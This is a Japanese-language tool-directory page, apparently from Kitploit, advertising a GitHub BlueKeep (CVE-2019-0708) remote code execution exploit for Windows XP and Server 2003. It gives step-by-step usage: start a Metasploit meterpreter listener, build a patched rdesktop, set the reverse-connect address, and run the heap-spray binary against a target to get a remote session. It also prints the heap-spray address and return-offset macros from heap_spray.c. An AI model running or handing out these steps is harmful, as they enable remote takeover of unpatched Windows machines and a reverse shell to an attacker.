Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2019-0708_bluekeep_rce — XP(SP2、SP3を含む全バージョン)で動作します。 | Kitploit
ツール/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
脆弱性分析エクスプロイトシェルコードペネトレーションテストリモートアクセスツールペイロード開発
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

XP(SP2、SP3を含む全バージョン)で動作します。

リポジトリを見る
7514117年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
  1. msfconsole meterpreter/multi/handler を実行し、192.168.116.133:6000 を待ち受けます。
  2. cd rdesktop-1.5.0 && make
  3. configを編集し、リバース接続のIPとポートを設定します。 192.168.116.133 6000
  4. ./heap_spray 192.168.116.134 を実行します (134はXPのアドレスで、メモリは>=2G必要です)。
  5. msfconsole の meterpreter でセッションが取得できます。

補足:

shellcode/shellcode.asm はカーネルshellcodeのソースコードで、コンパイル後にバイナリへ変換すると、rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b ファイルになります。make 時にそのままプログラムにコンパイルされます。

現在はXPのみサポートしており、XPのメモリは >= 2G 必要です。

2003をサポートする必要がある場合は、heap_spray.c 内の HEAP_SPRAY_ADDRESS マクロのアドレスを変更する必要があります。繰り返しテストしたところ、このアドレスは 03 のシステムバージョンやメモリサイズが異なると異なります。ただし、自分のマシンでテストする場合は、03 で利用を成功させることができます。汎用性はありません。

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址 如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

2003のテスト

  1. msfconsole meterpreter/multi/handler を実行し、192.168.116.133:6000 を待ち受けます。
  2. cd rdesktop-1.5.0 && make
  3. configを編集し、リバース接続のIPとポートを設定します。 192.168.116.133 6000
  4. ./_2003_heap_spray 192.168.116.135 を実行します (135は03のアドレスで、メモリは>=2G必要です)。
  5. msfconsole の meterpreter でセッションが取得できます。

login

ツールをダウンロード